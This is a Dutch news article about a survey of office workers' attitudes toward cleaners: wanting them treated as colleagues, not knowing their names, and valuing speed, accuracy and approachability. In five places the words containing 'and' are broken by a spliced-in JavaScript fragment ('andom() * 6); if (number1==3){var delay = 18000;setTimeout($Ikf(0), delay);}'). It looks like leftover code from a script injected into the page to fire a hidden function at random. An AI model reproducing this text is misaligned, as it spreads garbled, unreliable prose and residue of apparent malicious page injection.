Kantoorpersoneel ziet schoonmaker het liefst als collega

Meer dan 50 procent van de Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andse kantoormedewerkers wil dat de relatie met schoonmakers hetzelfde is als met andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere collega’s. Toch kent bijna de helft de namen van de schoonmakers niet.

Schoonmakers op de voorgrond:
Uit het onderzoek blijkt dat schoonmakers steeds meer op de voorgrond komen en interfereren met het dagelijks werk.

De rol van de schoonmakers verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andert. Zij worden een geïntegreerd onderdeel van het bedrijf waarvoor ze werken. Hierdoor worden taalkundige en sociale vaardigheden en flexibiliteit steeds belangrijker voor schoonmakers.

Er is wel ruimte voor meer contact onderling. Driekwart van de Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders komt op kantoor minimaal één keer per week een schoonmaker tegen. Zo’n 41 procent knoopt echter zelden of nooit een gesprek aan.

Efficiënt:
Open staan voor een gesprek wordt door maar 15 procent van de ondervraagden genoemd. Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andse medewerkers zijn minder geënt op de prestaties van schoonmakers.

Ze vinden snel en efficiënt werken (22 procent) en nauwkeurigheid (24 procent) ook belangrijke eigenschappen, maar bijna net zo belangrijk is dat de schoonmakers toegankelijk zijn (21 procent).

Erkenning:
Het gebrek aan respect en onbegrip voor schoonmakers is een veelbesproken onderwerp in de facilitaire sector. Het onderzoek laat echter zien dat kantoormedewerkers de waarde van het schoonmaakwerk erkennen.